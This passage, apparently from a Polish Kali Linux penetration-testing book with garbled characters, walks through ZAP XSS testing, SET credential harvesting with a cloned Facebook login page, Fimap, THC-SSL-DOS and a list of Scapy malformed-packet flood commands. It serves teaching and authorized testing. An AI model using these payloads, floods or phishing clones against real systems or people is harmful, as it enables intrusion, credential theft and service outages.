Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

